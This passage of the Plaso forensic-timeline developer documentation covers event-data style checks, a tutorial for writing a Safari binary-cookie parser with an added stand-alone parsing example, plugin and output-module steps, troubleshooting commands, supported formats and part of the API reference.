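          '%r: OS prefix %r must be the first segment' % (data_type, segment))
  return problems


def check_attribute_values(attributes):
  """Returns {attribute: problem} for values that break filtering or output.

  Allowed: bool, int, str, or a list whose items are all bool/int/str. Flags
  dict, bytes (binary strings), float, sets and nested lists. None is treated
  as "attribute not set" (assumption: unset attributes are left None).
  """
  problems = {}
  for name, value in attributes.items():
    if value is None or isinstance(value, ALLOWED_SCALARS):
      continue
    if isinstance(value, list):
      bad = [item for item in value if not isinstance(item, ALLOWED_SCALARS)]
      if bad:
        problems[name] = (
            'list item of unsupported type %s' % type(bad[0]).__name__)
      continue
    problems[name] = 'unsupported type %s' % type(value).__name__
  return problems


def check_event_data(data_type, attributes):
  """Runs both checks and returns one flat list of human readable problems."""
  problems = check_data_type(data_type)
  for name, problem in sorted(check_attribute_values(attributes).items()):
    problems.append('%s: %s' % (name, problem))
  return problems


# Constructed containers (not real Plaso event data): one clean, one broken.
GOOD_EVENT_DATA = ('windows:evtx:record', {
    'computer_name': 'WORKSTATION01',
    'event_identifier': 4624,
    'strings': ['S-1-5-18', 'SYSTEM'],
    'recovered': None,
})
BAD_EVENT_DATA = ('evtx:windows:record', {
    'computer_name': b'WORKSTATION01',
    'event_level': 0.5,
    'xml_attributes': {'Level': '0'},
    'strings': ['S-1-5-18', None],
})

if __name__ == '__main__':
  for data_type, attributes in (GOOD_EVENT_DATA, BAD_EVENT_DATA):
    print(data_type, check_event_data(data_type, attributes) or 'OK')
```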

Tests

• Use the test functions available in the local test_lib.py as much as possible instead of writing your own test functions. If you think a test function is missing please add it, or mail the developer list to see if you can get someone else to do it.
• Use self.CheckTimestamp for testing timestamp values.

Common test code should be stored in "test library" files, for example the parser test library is tests/parsers/test_lib.py. We do this for a few reasons:
• to remove code duplication in "boiler plate" test code;
• to make the tests more uniform in both look-and-feel but also what is tested;
• improve test coverage;
• isolate core functionality from tests to prevent some future core changes affecting the parsers and plugins too much.

2.3 How to write a parser

2.3.1 Introduction

This page is intended to give you an introduction into developing a parser for Plaso.
• First a step-by-step example is provided to create a simple binary parser for the Safari Cookies.binarycookies file.
• At the bottom are some common troubleshooting tips that others have run into before you.

This page assumes you have at least a basic understanding of programming in Python and use of git.


2.3.2 Format

Before you can write a binary file parser you will need to have a good understanding of the file format. A description of the Safari Cookies.binarycookies format can be found here.

2.3.3 Parsers vs. Plugins

Before starting work on a parser, check if Plaso already has a parser that handles the underlying format of the file you're parsing. Plaso currently supports plugins for the following file formats:
• Bencode
• Compound zip files
• Web Browser Cookies
• ESEDB
• OLECF
• Plist
• SQLite
• Syslog
• Windows Registry

If the artifact you're trying to parse is in one of these formats, you need to write a plugin of the appropriate type, rather than a parser. For our example, however, the Safari Cookies.binarycookies file is in its own binary format, so a separate parser is appropriate.

2.3.4 Test data

First we make a representative test file and add it to the test_data/ directory, in our example: test_data/Cookies.binarycookies

Make sure that the test file does not contain sensitive or copyrighted material.

2.3.5 Parsers, formatters, events and event data

• parser; a subclass of FileObjectParser that extracts events from the content of a file.
• formatter (or event formatter); a subclass of EventFormatter which generates a human readable description of the event data.
• event; a subclass of EventObject which represents an event.
• event data; a subclass of EventData which represents data related to the event.


Writing the parser

Registering the parser

Add an import for the parser to: plaso/parsers/__init__.py

It should look like this:

from plaso.parsers import safari_cookies

When plaso.parsers is imported this will load the safari_cookies module safari_cookies.py. The parser class BinaryCookieParser is registered using manager.ParsersManager.RegisterParser(BinaryCookieParser).

plaso/parsers/safari_cookies.py

# -*- coding: utf-8 -*-
"""Parser for Safari Binary Cookie files."""

from plaso.parsers import interface
from plaso.parsers import manager


class BinaryCookieParser(interface.FileObjectParser):
  """Parser for Safari Binary Cookie files."""

  NAME = 'binary_cookies'
  DATA_FORMAT = 'Safari Binary Cookie file'

  def ParseFileObject(self, parser_mediator, file_object, **kwargs):
    """Parses a Safari binary cookie file-like object.

    Args:
      parser_mediator (ParserMediator): parser mediator.
      file_object (dfvfs.FileIO): file-like object to be parsed.

    Raises:
      UnableToParseFile: when the file cannot be parsed, this will signal
          the event extractor to apply other parsers.
    """
    ...


manager.ParsersManager.RegisterParser(BinaryCookieParser)
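The skeleton above leaves the body of ParseFileObject to the reader. The following stand-alone Python, an added example that is not Plaso's own safari_cookies.py, shows the same pattern for the Cookies.binarycookies format: check the file signature, raise UnableToParseFile so the event extractor tries other parsers, bounds-check every offset read from the file, and produce only str and int values as the style guide asks. The binarycookies layout is written from memory rather than from this page (the linked format description is authoritative), UnableToParseFile is a local stand-in for plaso.lib.errors.UnableToParseFile so the code runs without Plaso installed, and the sample file is constructed inside the code.

```python
import io
import struct

# POSIX timestamp of the Cocoa epoch (2001-01-01 UTC) the cookie times count from.
_COCOA_EPOCH_POSIX = 978307200


class UnableToParseFile(Exception):
  """Stand-in for plaso.lib.errors.UnableToParseFile (assumption): raising it
  tells the event extractor that this parser does not apply to the file."""


def _read_cstring(page, offset):
  """Returns the NUL-terminated UTF-8 string stored in page at offset."""
  return page[offset:page.index(b'\x00', offset)].decode('utf-8')


def parse_binary_cookies(file_object):
  """Parses a Safari Cookies.binarycookies file-like object into dicts.

  Layout used here (from recollection of the format, not from this page):
  file header b'cook', page count and page sizes (uint32 BE); each page starts
  with 0x00000100, a cookie count and cookie offsets (uint32 LE, relative to
  the page); each cookie: size, unknown, flags, unknown, url/name/path/value
  offsets (uint32 LE, relative to the cookie), 8 unknown bytes, expiration and
  creation time (float64 LE seconds since the Cocoa epoch), then the strings.
  Only str and int values are produced, the types the style guide allows;
  flags stay an int rather than being split into bools.
  """
  header = file_object.read(8)
  if len(header) < 8 or header[:4] != b'cook':
    raise UnableToParseFile('missing "cook" file signature')
  number_of_pages = struct.unpack('>I', header[4:8])[0]
  size_table = file_object.read(4 * number_of_pages)
  if len(size_table) != 4 * number_of_pages:
    raise UnableToParseFile('truncated page size table')
  cookies = []
  for page_size in struct.unpack('>%dI' % number_of_pages, size_table):
    page = file_object.read(page_size)
    if len(page) != page_size or page[:4] != b'\x00\x00\x01\x00':
      raise UnableToParseFile('truncated page or bad page signature')
    number_of_cookies = struct.unpack('<I', page[4:8])[0]
    if 8 + 4 * number_of_cookies > page_size:
      raise UnableToParseFile('cookie offset table outside its page')
    offsets = struct.unpack(
        '<%dI' % number_of_cookies, page[8:8 + 4 * number_of_cookies])
    for offset in offsets:
      if offset + 56 > page_size:
        raise UnableToParseFile('cookie record outside its page')
      (_, _, flags, _, url_offset, name_offset, path_offset,
       value_offset) = struct.unpack('<8I', page[offset:offset + 32])
      expiration, creation = struct.unpack('<2d', page[offset + 40:offset + 56])
      cookies.append({
          'url': _read_cstring(page, offset + url_offset),
          'name': _read_cstring(page, offset + name_offset),
          'path': _read_cstring(page, offset + path_offset),
          'value': _read_cstring(page, offset + value_offset),
          'flags': flags,
          'expiration_time': int(expiration) + _COCOA_EPOCH_POSIX,
          'creation_time': int(creation) + _COCOA_EPOCH_POSIX,
      })
  return cookies


def parse_bytes(data):
  """Parses in-memory file content, e.g. SAMPLE_FILE below."""
  return parse_binary_cookies(io.BytesIO(data))


def _build_cookie(url, name, path, value, flags, expiration, creation):
  """Serializes one cookie record in the layout parse_binary_cookies reads."""
  encoded = [s.encode('utf-8') + b'\x00' for s in (url, name, path, value)]
  offsets, position = [], 56
  for field in encoded:
    offsets.append(position)
    position += len(field)
  record = struct.pack('<8I', position, 0, flags, 0, *offsets)
  record += b'\x00' * 8 + struct.pack('<2d', expiration, creation)
  return record + b''.join(encoded)


def build_sample_file(cookie_specs):
  """Builds a constructed single-page binarycookies file (test data only)."""
  records = [_build_cookie(*spec) for spec in cookie_specs]
  offsets, position = [], 8 + 4 * len(records) + 4
  for record in records:
    offsets.append(position)
    position += len(record)
  page = b'\x00\x00\x01\x00' + struct.pack('<I', len(records))
  page += struct.pack('<%dI' % len(records), *offsets) + b'\x00' * 4
  page += b''.join(records)
  return b'cook' + struct.pack('>2I', 1, len(page)) + page


# Constructed sample: (url, name, path, value, flags, expiration, creation).
SAMPLE_FILE = build_sample_file([
    ('example.com', 'session', '/', 'abc123', 5, 1e9, 6e8),
    ('.example.org', 'tracker', '/ads', 'xyz', 0, 1.5e9, 6e8),
])
```

Calling parse_bytes(SAMPLE_FILE) returns two dicts whose timestamps are POSIX integers; feeding it anything without the "cook" signature raises UnableToParseFile instead of a struct error.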


Writing the message formatter

The event message format is defined in data/formatters/*.yaml. For more information about the configuration file format see: message formatting

2.4 How to write a parser plugin

Writing a parser plugin is different depending on which parser you're writing a plugin for. Parsers that support plugins are:
• bencode
• cookie
• czip (Compound zip files)
• esedb
• olecf
• plist
• sqlite
• syslog
• winreg

2.5 How to write an analysis plugin

2.5.1 Create file and class

• Plugin file in plaso/analysis/
  – Create an empty subclass of AnalysisPlugin
  – Register it with the analysis plugin manager by calling AnalysisPluginManager.RegisterPlugin
• Test file in tests/analysis/
  – Create an empty subclass of tests.analysis.test_lib.AnalysisPluginTestCase

2.5.2 Write minimal tests

• Write a test that loads your plugin
• It will fail initially, but running the test while you're developing your plugin gives you a quick way to see if your code is doing what you expect.


2.5.3 Develop plugin

• Implement your subclass of AnalysisPlugin
• You'll need to define/override:
  – NAME
  – ExamineEvent()
  – CompileReport()
• You may also want to override:
  – URLS
  – ENABLE_IN_EXTRACTION, if your plugin is eligible to run while Plaso is extracting events.

2.5.4 Expand tests

• Add additional tests that test your plugin

2.5.5 Register classes

• Edit plaso/analysis/__init__.py to import your plugin in the correct alphabetical order.

2.5.6 Code review/submit

2.6 How to write an output module

2.6.1 Create file and class

• Plugin file in plaso/output/
  – Create an empty subclass of plaso.output.interface.OutputModule
  – Register it with the output module manager by calling OutputManager.RegisterOutput
• Test file in tests/output/
  – Create an empty subclass of tests.output.test_lib.OutputModuleTestCase

2.6.2 Write minimal tests

• Write a test that loads your output module.
• It will fail initially, but running the test while you're developing your plugin gives you a quick way to see if your code is doing what you expect.


2.6.3 Develop plugin

• Implement your subclass of plaso.output.interface.OutputModule
• You'll need to define/overwrite:
  – NAME
  – DESCRIPTION
  – WriteEventBody
• You may also want to override:
  – Open()
  – Close()
  – GetMissingArguments()
  – WriteHeader()
  – WriteEventMACBGroup()
  – WriteFooter()

2.6.4 Expand tests

• Add additional tests that test your plugin

2.6.5 Register classes

• Edit plaso/output/__init__.py to import your plugin in the correct alphabetical order.

2.6.6 Code review/submit

• Create a PR to have the changes reviewed and merged with the main branch.


CHAPTER THREE

TROUBLESHOOTING

This page contains instructions that can be used to assist you in debugging potential issues with Plaso and its dependencies.

3.1 Quick list

1. Check the commit history and issue tracker if the bug has already been fixed;
2. If you are running the development release make sure Plaso and dependencies are up to date, see: Developers Guide
3. If you are experiencing an issue that cannot directly be attributed to some broken code, e.g. the tests are getting killed, check your system logs; it might be a problem with resources available to Plaso;
4. Try to isolate the error, see below.

If everything fails create a new issue on the issue tracker. Please provide as much detailed information as possible, keep in mind that:
• we cannot fix errors based on vague descriptions;
• we cannot look into your thoughts or on your systems;
• we cannot easily isolate errors if you keep changing your test environment.

Hence please provide us with the following details:
• What steps will reproduce the problem?
  – What output did you expect?
  – What do you see instead?
• The output of log2timeline.py --troubles, which provides:
  – The Python version including operating system and architecture
  – The path to plaso/log2timeline
  – The version of plaso/log2timeline
  – Information about dependencies
• Are you processing a storage media image, if so which format, a directory or an individual file?
• Were you able to isolate the error to a specific file? Is it possible to share the file with the developer?
• Any additional information that could be of use e.g. build logs, error logs, debug logs, etc.


Note that the GitHub issue tracker uses Markdown, so please escape blocks of error output accordingly. Also see the sections below on how to troubleshoot issues of a specific nature.

3.1.1 Performance related issues

• On what type of media is your source data stored? What type of media are you writing to?
  – A local disk, a removable disk or network storage?
  – Both removable media and network storage can add additional latency to reads and writes making overall processing slow. It is recommended to at least write to local low-latency media.
• Are you seeing workers being killed?
  – Respawning of workers creates more overhead and slower processing times.
  – Workers being killed typically indicates one of the parsers misbehaving. If the worker is consuming a high amount of memory, also see section "High memory usage" below.
• Are you running Plaso in a VM or Docker container?

3.2 Isolating errors

The most important part of troubleshooting is isolating the error. Can you run the tests successfully?

$ python run_tests.py
...
----------------------------------------------------------------------
Ran 585 tests in 66.530s

OK

If an error occurs when processing a storage media image try to run with the storage media image file and/or the file system directly mounted. Mounting the storage media image file will bypass the libraries (modules) supporting the storage media image format. Running source_analyzer.py can help pinpoint the issue, e.g.

PYTHONPATH=. python scripts/source_analyzer.py --no-auto-recurse

Try:
• logging to a log file: log2timeline.py --log-file=log2timeline.log ...;
• running in debug mode: log2timeline.py --debug ...;
• running in single process mode, this will bypass any issues with multi processing: log2timeline.py --single-process ...;
• mounting the file system as well to bypass libraries (modules) supporting the file system, e.g. the SleuthKit and pytsk;
• running in single process and debug mode, see section below.


3.3 Producing debug logs

To produce debugging logs, run log2timeline like so:

log2timeline.py --log-file=log2timeline_problem.log.gz --debug

This will create multiple, gzip-compressed log files. There will be one called log2timeline_problem.log.gz containing logs from the main log2timeline process, and one log file for each worker process. Note that the .gz file suffix is important, as it triggers Plaso to compress the log output. In an uncompressed form, the logs are very large. The compressed logs can be reviewed with gzip-aware tools like zless and zgrep.

3.4 Import errors

It sometimes happens that the tests fail with an import error, e.g.

ImportError: Failed to import test module: plaso.parsers.winreg_plugins.shutdown_test
Traceback (most recent call last):
  File "/usr/lib64/python3.7/unittest/loader.py", line 254, in _find_tests
    module = self._get_module_from_name(name)
  File "/usr/lib64/python3.7/unittest/loader.py", line 232, in _get_module_from_name
    __import__(name)
  File "./plaso/parsers/__init__.py", line 4, in <module>
    from plaso.parsers import asl
ImportError: cannot import name asl

This does not necessarily mean that the code cannot find the asl module. The import error can mask an underlying issue. Try running the following commands in a Python shell:

$ python
>>> import sys
>>> sys.path.insert(0, u'.')
>>> import plaso

It also sometimes means that you have multiple versions of Plaso installed on your system and Python tries to import from the wrong one.

3.5 Crashes, hangs and tracebacks

In the context of Plaso crashes and tracebacks have different meanings:
• crash; an error that causes an abrupt termination of the program you were running e.g. a segfault (SIGSEGV)
• traceback; the back trace of an error that was caught by an exception handler that can cause a termination of the program you were running


3.5.1 A worker segfault-ing

Since Plaso relies on several compiled dependencies it is possible that a worker segfaults (SIGSEGV). As part of the 1.3 pre-release bug hunting a SIGSEGV signal handler was added, however this process turned out, as expected, to be unreliable. However it added an interesting side effect that is very useful for debugging. If the SIGSEGV signal handler is enabled the worker process typically remains in the "running" state but stops producing event objects. What happens under the hood is that the SIGSEGV signal is caught but the worker is unable to cleanly terminate. Because of this "frozen" state of the worker it is very easy to attach a debugger, e.g. gdb python -p PID. A kill -11 PID however seems to be cleanly handled by the SIGSEGV signal handler and puts the worker into "error" status.

3.5.2 A worker gives a killed status

This typically indicates that the worker was killed (SIGKILL), likely by an external process, e.g. the Out Of Memory (OOM) killer. Your system logs might indicate why the worker was killed.

3.5.3 Which processes are running

The following commands help you determine which Plaso processes are running on your system:

Linux:

top -p `ps -ef | grep log2timeline.py | grep python | awk '{ print $2 }' | tr '\n' ',' | sed 's/,$//'`

MacOS:

ps aux | grep log2timeline.py | grep python | awk '{print $2}' | tr '\n' ',' | sed 's/,$//'

3.5.4 Analyzing crashes with single process and debug mode

In single process and debug mode (log2timeline.py --debug --single-process ...) log2timeline will run a Python debug shell (pdb) when an uncaught Python exception is raised. Use:
• w to print the frames.
• u to go up one frame or d to go down one frame.
• l to print source code of the current frame.

Note that typically the top-level (oldest) frame will contain the exception:

p exception

Note that inside pdb you can run any Python command, including loading new libraries, e.g. for troubleshooting. You can prepend commands with an exclamation mark (!) to indicate that you want to run a Python command as opposed to a debug shell one. To print the attributes of the current object you are looking at:

!self.__dict__

To print the current argument stack to see what arguments are available to you:

args

3.5.5 Analyzing crashes with gdb

Once you have isolated the file that causes the crash and you cannot share the file you can generate a backtrace that can help us fix the error. First make sure you have the debug symbols installed. Then run Plaso as a single process with gdb:

gdb --ex r --args log2timeline.py --single-process -d docs/sources/Troubleshooting.md --storage-file timeline.plaso file_that_crashes_the_tool

To generate a back trace:

bt

Note that often the first 10 lines of the back trace are sufficient information. An alternative approach is to attach a debugger to it once the program is running:

gdb python -p PID

Where PID is the process identifier of the program. Once the debugger is attached continue running:

c

Wait until the crash occurs and generate a back trace. Also see: DebuggingWithGdb, gdb Support

3.6 High memory usage

Plaso consists of various components. It can happen that one of these components uses a lot of memory or even leaks memory. In these cases it is important to isolate the error, see before, to track down what the possible culprit is.

Also see: Profiling memory usage
Also see: Troubleshooting Plaso Issues - Memory Edition


3.7 MacOS specific issues

3.7.1 How do I remove a Plaso installation

If you installed Plaso via the installer script in the .dmg, the MacOS package manager can be used to remove a Plaso installation. For more information about using the MacOS package manager see:
• http://superuser.com/questions/36567/how-do-i-uninstall-any-apple-pkg-package-file

3.7.2 PyParsing errors

MacOS bundles its own version of PyParsing that is older than the version required by Plaso. Fix this by using the special wrapper scripts (log2timeline.sh, et al.), or if you don't want to do that, manipulate PYTHONPATH so that the newer version is loaded. This is detailed on the MacOS development page.

3.7.3 ImportError: cannot import name dependencies

There can be numerous reasons for imports to fail on MacOS; here we describe some of the more common ones encountered:
• clashing versions; you have multiple clashing versions installed on your system, check the Python site-packages paths such as: /Library/Python/2.7/site-packages/, /usr/local/lib/python2.7/site-packages/
• you used pip without virtualenv and have messed up your site-packages

3.7.4 You used pip without virtualenv and have messed up your site-packages

The use of pip without virtualenv on MacOS is strongly discouraged, unless you are very familiar with these tools. You might have already messed up your site-packages beyond a state of a timely repair.

3.8 Ubuntu Linux specific issues

3.8.1 Origin of an installed package

To determine the origin of an installed package:

apt-cache showpkg

3.9 Windows specific issues

3.9.1 Not a valid Win32 application

When I load one of the Python modules I get:

ImportError: DLL load failed: %1 is not a valid Win32 application.


This means your Python interpreter (on Windows) cannot load a Python module since the module is not a valid Win32 DLL file. One cause of this could be a mismatch between a 64-bit Python and a 32-bit build of the module (or vice versa).

3.9.2 Unable to find an entry point in DLL

When I try to import one of the Python-bindings I get:

ImportError: DLL load failed: The specified procedure could not be found.

Make sure the DLL is built for the right WINAPI version, check the value of WINVER of your build.

3.9.3 setup.py and build errors

Unable to find vcvarsall.bat

When running setup.py I get:

error: Unable to find vcvarsall.bat

Make sure the environment variable VS90COMNTOOLS is set, e.g. for Visual Studio 2010:

set VS90COMNTOOLS=%VS100COMNTOOLS%

Or set it to a path:

set VS90COMNTOOLS="C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\Tools\"

ValueError: [u’path’] when running setup.py

When running setup.py I get:

ValueError: [u'path']

Try running the command from the “Windows SDK 7.1” or “Visual Studio” Command Prompt.

I’m getting linker “unresolved externals” errors when running setup.py

If you're building a 64-bit version of a Python binding with Visual Studio 2010 Express make sure to use the "Windows SDK 7.1 Command Prompt".


CHAPTER FOUR

SUPPORTED FORMATS

The information below is based on version 20210213

4.1 Storage media image file formats

Storage media image file format support is provided by dfvfs.

4.2 Volume system formats

Volume system format support is provided by dfvfs.

4.3 File system formats

File System Format support is provided by dfvfs.

4.4 File formats

• Apple System Log (ASL)
• Android usage-history (app usage)
• Basic Security Module (BSM)
• Bencode files
• Chrome Disk Cache Format
• Chrome preferences
• CUPS IPP
• Extensible Storage Engine (ESE) Database File (EDB) format using libesedb
• Firefox Cache
• Java WebStart IDX
• Jump Lists .customDestinations-ms files
• MacOS Application firewall
• MacOS Keychain
• MacOS Securityd
• MacOS Wifi
• mactime logs
• McAfee Anti-Virus Logs
• Microsoft Internet Explorer History File Format (also known as MSIE 4 - 9 Cache Files or index.dat) using libmsiecf
• Microsoft IIS log files
• NTFS $MFT and $UsnJrnl:$J using libfsntfs
• OLE Compound File using libolecf
• Opera Browser history
• OpenXML
• Pcap files
• Portable Executable (PE) files using pefile
• PL SQL cache file (PL-SQL developer recall files)
• Popularity Contest log
• Property list (plist) format using plistlib
• Restore Point logs (rp.log)
• Safari Binary Cookies
• SCCM client logs
• SELinux audit logs
• SkyDrive log and error log files
• SQLite database format using SQLite
• Symantec AV Corporate Edition and Endpoint Protection log
• Syslog
• utmp, utmpx
• Windows Event Log (EVT) using libevt
• Windows Firewall
• Windows Job files (also known as "at jobs")
• Windows Prefetch files
• Windows Recycle bin (INFO2 and $I/$R)
• Windows NT Registry File (REGF) using libregf
• Windows Shortcut File (LNK) format using liblnk (including shell item support)
• Windows XML Event Log (EVTX) using libevtx
• Xchat and Xchat scrollback files
• Zsh history files


4.5 Bencode file formats

• Transmission BitTorrent activity file
• uTorrent active

4.6 Browser cookie formats

• Google Analytics __utma cookie
• Google Analytics __utmb cookie
• Google Analytics __utmt cookie
• Google Analytics __utmz cookie

4.7 Compound ZIP file formats

• OpenXML (OXML) file

4.8 ESE database file formats

• Internet Explorer WebCache ESE database (WebCacheV01.dat, WebCacheV24.dat) file
• System Resource Usage Monitor (SRUM) ESE database file
• Windows 8 File History ESE database file

4.9 OLE Compound File formats

• Automatic destinations jump list OLE compound file (.automaticDestinations-ms)
• Document summary information (\0x05DocumentSummaryInformation)
• Summary information (\0x05SummaryInformation) (top-level only)

4.10 Property list (plist) formats

• Airport plist file
• Apple account information plist file
• Bluetooth plist file
• iPod, iPad and iPhone plist file
• Launchd plist file
• MacOS installation history plist file
• MacOS software update plist file
• MacOS user plist file
• Safari history plist file
• Spotlight plist file
• Spotlight volume configuration plist file
• TimeMachine plist file

4.11 SQLite database file formats

• Android call history SQLite database (contacts2.db) file
• Android text messages (SMS) SQLite database (mmssms.dbs) file
• Android WebViewCache SQLite database file
• Android WebView SQLite database file
• Google Chrome 17 - 65 cookies SQLite database file
• Google Chrome 27 and later history SQLite database file
• Google Chrome 66 and later cookies SQLite database file
• Google Chrome 8 - 25 history SQLite database file
• Google Chrome autofill SQLite database (Web Data) file
• Google Chrome extension activity SQLite database file
• Google Drive snapshot SQLite database (snapshot.db) file
• Google Hangouts conversations SQLite database (babel.db) file
• iOS Kik messenger SQLite database (kik.sqlite) file
• Kodi videos SQLite database (MyVideos.db) file
• MacOS and iOS iMessage database (chat.db, sms.db) file
• MacOS application usage SQLite database (application_usage.sqlite) file
• MacOS document revisions SQLite database file
• MacOS Duet / KnowledgeC SQLite database file
• MacOS launch services quarantine events database SQLite database file
• MacOS MacKeeper cache SQLite database file
• MacOS Notes SQLite database (NotesV7.storedata) file
• MacOS Notification Center SQLite database file
• MacOS Transparency, Consent, Control (TCC) SQLite database (TCC.db) file
• Mozilla Firefox cookies SQLite database file
• Mozilla Firefox downloads SQLite database (downloads.sqlite) file
• Mozilla Firefox history SQLite database (places.sqlite) file
• Safari history SQLite database (History.db) file
• Skype SQLite database (main.db) file
• Tango on Android profile SQLite database file
• Tango on Android TC SQLite database file
• Twitter on Android SQLite database file
• Twitter on iOS 8 and later SQLite database (twitter.db) file
• Windows 10 Timeline SQLite database (ActivitiesCache.db) file
• Zeitgeist activity SQLite database file

4.12 Syslog file formats

• Cron syslog line
• SSH syslog line

4.13 Windows Registry formats

• Application Compatibility Cache Registry data
• Background Activity Moderator (BAM) Registry data
• BagMRU (or ShellBags) Registry data
• Boot Execution Registry data
• CCleaner Registry data
• Microsoft Internet Explorer zone settings Registry data
• Microsoft Office MRU Registry data
• Microsoft Outlook search MRU Registry data
• Most Recently Used (MRU) Registry data
• Run and run once Registry data
• Security Accounts Manager (SAM) users Registry data
• Terminal Server Client Connection Registry data
• Terminal Server Client Most Recently Used (MRU) Registry data
• User Assist Registry data
• Windows boot verification Registry data
• Windows drivers and services Registry data
• Windows Explorer mount points Registry data
• Windows Explorer Programs Cache Registry data
• Windows Explorer typed URLs Registry data
• Windows last shutdown Registry data
• Windows log-on Registry data
• Windows network drives Registry data
• Windows networks (NetworkList) Registry data
• Windows Task Scheduler cache Registry data
• Windows time zone Registry data
• Windows USB device Registry data
• Windows USB Plug And Play Manager USBStor Registry data
• Windows version (product) Registry data
• WinRAR History Registry data

4.14 Hashers Supported

• MD5
• SHA1
• SHA256

CHAPTER FIVE

PLASO PACKAGE

5.1 Subpackages

5.1.1 plaso.analysis package

Submodules

plaso.analysis.browser_search module

A plugin that extracts browser history from events.

class plaso.analysis.browser_search.BrowserSearchPlugin
    Bases: plaso.analysis.interface.AnalysisPlugin

    Analyze browser search entries from events.

    CompileReport(mediator)
        Compiles an analysis report.
        Parameters: mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
        Returns: analysis report.
        Return type: AnalysisReport

    ExamineEvent(mediator, event, event_data, event_data_stream)
        Analyzes an event.
        Parameters:
        • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
        • event (EventObject) – event.
        • event_data (EventData) – event data.
        • event_data_stream (EventDataStream) – event data stream.

    NAME = 'browser_search'

plaso.analysis.chrome_extension module

A plugin that gathers extension IDs from Chrome browser history.

class plaso.analysis.chrome_extension.ChromeExtensionPlugin
    Bases: plaso.analysis.interface.AnalysisPlugin

    Convert Chrome extension IDs into names, requires Internet connection.

    CompileReport(mediator)
        Compiles an analysis report.
        Parameters: mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
        Returns: analysis report.
        Return type: AnalysisReport

    ExamineEvent(mediator, event, event_data, event_data_stream)
        Analyzes an event.
        Parameters:
        • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
        • event (EventObject) – event to examine.
        • event_data (EventData) – event data.
        • event_data_stream (EventDataStream) – event data stream.

    NAME = 'chrome_extension'

plaso.analysis.definitions module

This file contains the definitions for analysis plugins.

plaso.analysis.hash_tagging module

This file contains the interface for analysis plugins. class plaso.analysis.hash_tagging.HTTPHashAnalyzer(hash_queue, hash_analysis_queue, hashes_per_batch=1, lookup_hash='sha256', wait_after_analysis=0) Bases: plaso.analysis.hash_tagging.HashAnalyzer Interface for hash analysis thread that uses HTTP(S) abstract Analyze(hashes) Analyzes a list of hashes. Parameters hashes (list[str]) – hashes to look up. Returns analysis results. Return type list[HashAnalysis] MakeRequestAndDecodeJSON(url, method, **kwargs) Make a HTTP request and decode the results as JSON. Parameters

40 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• url (str) – URL to make a request to. • method (str) – HTTP method to used to make the request. GET and POST are supported. • kwargs – parameters to the requests .get() or post() methods, depending on the value of the method parameter. Returns body of the HTTP response, decoded from JSON. Return type dict[str, object] Raises • ConnectionError – If it is not possible to connect to the given URL, or it the request returns a HTTP error. • ValueError – If an invalid HTTP method is specified. class plaso.analysis.hash_tagging.HashAnalysis(subject_hash, hash_information) Bases: object Analysis information about a hash. hash_information object containing information about the hash. Type object subject_hash hash that was analyzed. Type str class plaso.analysis.hash_tagging.HashAnalyzer(hash_queue, hash_analysis_queue, hashes_per_batch=1, lookup_hash='sha256', wait_after_analysis=0) Bases: threading.Thread Interface of a hash analyzer threads. analyses_performed number of analysis batches completed by this analyzer. Type int hashes_per_batch maximum number of hashes to analyze at once. Type int lookup_hash name of the hash attribute to look up. Type str seconds_spent_analyzing number of seconds this analyzer has spent performing analysis (as opposed to waiting on queues, etc.) Type int wait_after_analysis number of seconds the analyzer will sleep for after analyzing a batch of hashes. Type int abstract Analyze(hashes) Analyzes a list of hashes.

5.1. Subpackages 41 Plaso (log2timeline), Release 20210606

Parameters hashes (list[str]) – list of hashes to look up. Returns list of results of analyzing the hashes. Return type list[HashAnalysis] EMPTY_QUEUE_WAIT_TIME = 4 SUPPORTED_HASHES = [] SetLookupHash(lookup_hash) Sets the lookup hash to query. Parameters lookup_hash (str) – name of the hash attribute to look up. Raises ValueError – if the lookup hash is not supported. SignalAbort() Instructs the hash analyzer to abort. run() The method called by the threading library to start the thread. class plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin(analyzer_class) Bases: plaso.analysis.interface.AnalysisPlugin An interface for plugins that tag events based on the source file hash. An implementation of this class should be paired with an implementation of the HashAnalyzer interface. CompileReport(mediator) Compiles an analysis report. Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfVFS. Returns report. Return type AnalysisReport DATA_TYPES = [] DEFAULT_QUEUE_TIMEOUT = 4 EstimateTimeRemaining() Estimates how long until all hashes have been analyzed. Returns estimated number of seconds until all hashes have been analyzed. Return type int ExamineEvent(mediator, event, event_data, event_data_stream) Evaluates whether an event contains the right data for a hash lookup. Parameters • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfVFS. • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. abstract GenerateLabels(hash_information) Generates a list of strings to tag events with.


        Parameters: hash_information (bool) – response from the hash tagging analyzer that indicates whether the file hash was present or not.
        Returns: list of labels to apply to event.
        Return type: list[str]

    SECONDS_BETWEEN_STATUS_LOG_MESSAGES = 30

    SetLookupHash(lookup_hash)
        Sets the hash to query.
        Parameters: lookup_hash (str) – name of the hash attribute to look up.

plaso.analysis.interface module

This file contains the interface for analysis plugins.

class plaso.analysis.interface.AnalysisPlugin
    Bases: object

    Class that defines the analysis plugin interface.

    CompileReport(mediator)
        Compiles a report of the analysis. After the plugin has received every copy of an event to analyze, this function is called so that the report can be assembled.
        Parameters: mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
        Returns: report.
        Return type: AnalysisReport

    abstract ExamineEvent(mediator, event, event_data, event_data_stream)
        Analyzes an event.
        Parameters:
            • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
            • event (EventObject) – event.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.

    NAME = 'analysis_plugin'

    TEST_PLUGIN = False

    property plugin_name
        name of the plugin.
        Type: str

plaso.analysis.logger module

The analysis sub module logger.

plaso.analysis.manager module

This file contains the analysis plugin manager class.

class plaso.analysis.manager.AnalysisPluginManager
    Bases: object

    Analysis plugin manager.

    classmethod DeregisterPlugin(plugin_class)
